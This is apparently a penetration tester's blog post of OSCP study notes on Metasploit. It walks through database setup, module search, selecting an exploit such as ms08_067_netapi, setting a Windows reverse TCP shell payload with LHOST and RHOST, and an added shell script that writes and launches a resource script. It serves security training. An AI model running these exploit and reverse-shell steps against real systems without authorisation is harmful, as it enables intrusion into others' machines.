Quick Metasploit Guide

These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Prep:
Ensure postgresql is running (msfconsole uses it for the module cache and for workspace data such as hosts, services and loot; without it, search is slow and nothing is saved).

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable

On current Kali, which boots with systemd, the equivalent commands are:
$> sudo systemctl start postgresql
$> sudo systemctl enable postgresql

The first time, also create the Metasploit database and its user:
$> sudo msfdb init

From the command line, fire up the Metasploit console:
$> msfconsole

Search for exploits related to what you are interested in:
msf> search smb

Or, be more specific:
msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from the regular command line, outside of MSF). Note that searchsploit queries the local copy of Exploit-DB, not the Metasploit module tree, so many of its hits are standalone proof-of-concept exploits that you would have to run or port yourself:
$> searchsploit smb

Once you find an exploit you want to use, use it (the module path below is a placeholder; real module paths look like exploit/windows/smb/ms08_067_netapi):
msf> use exploit/windows/smb_hack

Then set a payload (show payloads lists the ones compatible with the chosen module; windows/shell/reverse_tcp is a staged reverse shell, so the target must be able to reach your listener):
msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:
msf> show options

Set options as needed:

LHOST is the address the reverse payload connects back to, i.e. your listener (your Kali VM, for example). It must be an address the victim can actually route to; on a multi-homed box, pick the interface facing the target.

msf> set LHOST 192.168.0.x

RHOST is the IP of the victim. Current Metasploit versions call this option RHOSTS, which accepts a single address, a range, a CIDR block or a file, and still accepts RHOST as an alias:
msf> set RHOST 192.168.1.x

RPORT defaults to the port the module targets (445 for SMB modules, 80 for most HTTP ones), so you only need to change it if the service is listening somewhere non-standard:
msf> set RPORT 8081

Run the exploit (run does the same thing; exploit -j launches it as a background job so you keep the console, and sessions -i 1 then attaches you to the first session):
msf> exploit
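The console steps above can be replayed non-interactively. The script below is an added example, not something from the original post: it validates the addresses and port, writes them into a Metasploit resource script (.rc), checks that postgresql is up, and hands the file to msfconsole -r. The module, payload and IP addresses it uses are placeholders chosen for illustration; the is_ipv4, write_rc and run_rc function names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): generate and run a Metasploit
# resource script that replays the console workflow described above.

# Return 0 if $1 is a dotted-quad IPv4 address with octets 0-255, else 1.
is_ipv4() {
    ip=$1
    case $ip in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # non-digits, leading/trailing or empty fields
    esac
    set -- $(printf '%s' "$ip" | tr '.' ' ')   # split into octets
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Write a resource script. Arguments:
#   $1 output file  $2 module path  $3 payload  $4 LHOST  $5 RHOSTS  $6 RPORT
# Fails (non-zero) without writing anything if an address or port is malformed.
write_rc() {
    out=$1 module=$2 payload=$3 lhost=$4 rhosts=$5 rport=$6
    is_ipv4 "$lhost"  || { echo "bad LHOST: $lhost"  >&2; return 1; }
    is_ipv4 "$rhosts" || { echo "bad RHOSTS: $rhosts" >&2; return 1; }
    case $rport in ''|*[!0-9]*) echo "bad RPORT: $rport" >&2; return 1 ;; esac
    [ "$rport" -ge 1 ] && [ "$rport" -le 65535 ] || { echo "bad RPORT: $rport" >&2; return 1; }
    # Each line is exactly what you would type at the msf> prompt.
    # 'exploit -j' keeps the console usable; 'sessions -i 1' attaches afterwards.
    cat >"$out" <<EOF
use $module
set PAYLOAD $payload
set LHOST $lhost
set RHOSTS $rhosts
set RPORT $rport
show options
exploit -j
EOF
}

# Make sure the database backend is up (the prep step above), then run the
# script quietly; msfconsole stays interactive when the script finishes.
run_rc() {
    rc=$1
    pg_isready -q 2>/dev/null || sudo systemctl start postgresql
    msfconsole -q -r "$rc"
}

# Usage (placeholder module and addresses):
#   write_rc smb.rc exploit/windows/smb/ms08_067_netapi windows/shell/reverse_tcp \
#       192.168.0.10 192.168.1.20 445 && run_rc smb.rc
```

The validation matters more than it looks: a typo in LHOST means the stager on the target tries to connect somewhere else entirely, and the only symptom you see is "Exploit completed, but no session was created."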

If you are expecting a remote shell, beware that a plain command shell prints no prompt or banner, so what looks like nothing happening may already be your shell waiting for input. Just try executing a command and see what comes back:

ls
dir
pwd
id

(ls, pwd and id tell you it is a Unix shell; dir tells you it is a Windows one.)

About Will Chatham

Will Chatham is a Cyber Security Analyst, Ethical Hacker, and Penetration Tester at a data center in Asheville, NC. Since Netscape 2.0, he has worked in a wide array of environments including non-profit, corporate, small business, and government. His varied background, from developer to search engine optimizer to security professional, has helped him build a wide range of skills that help those with whom he works and teaches.